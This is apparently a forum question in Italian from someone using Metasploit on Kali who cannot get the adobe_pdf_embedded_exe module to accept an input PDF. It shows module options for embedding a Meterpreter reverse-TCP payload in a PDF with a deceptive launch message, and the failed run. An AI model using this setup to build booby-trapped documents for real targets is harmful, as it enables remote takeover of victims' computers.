Sto utilizzando MSF su Kali ma ho riscontrato un problema.
Sto provando adobe_pdf_embedded_exe
e ho impostato INFILENAME
su readme.pdf. Tutto il resto funziona bene, ma quando provo a eseguirlo usando il comando exploit
, mi dà questo:
msf exploit(windows/fileformat/adobe_pdf_embedded_exe) > show options
Module options (exploit/windows/fileformat/adobe_pdf_embedded_exe):
Name Current Setting Required Description
---- --------------- -------- -----------
EXENAME no The Name of payload exe.
FILENAME readme.pdf no The output filename.
INFILENAME /root/desktop/readme.pdf yes The Input PDF filename.
LAUNCH_MESSAGE To view the encrypted content please tick the "Do not show this message again" box and press Open. no The message to display in the File: area
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.100.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
DisablePayloadHandler: True (RHOST and RPORT settings will be ignored!)**
Exploit target:
Id Name
-- ----
0 Adobe Reader v8.x, v9.x / Windows XP SP3 (English/Spanish) / Windows Vista/7 (English)
msf exploit(windows/fileformat/adobe_pdf_embedded_exe) > exploit
[-] Exploit failed: The following options failed to validate: INFILENAME."
Ho provato a impostare INFILENAME
sul percorso: /root/desktop/readme.pdf
Ma continua a dare lo stesso errore.
Inoltre, ho creato il pdf creando un documento google ed esportandolo in formato pdf. Non so cosa fare.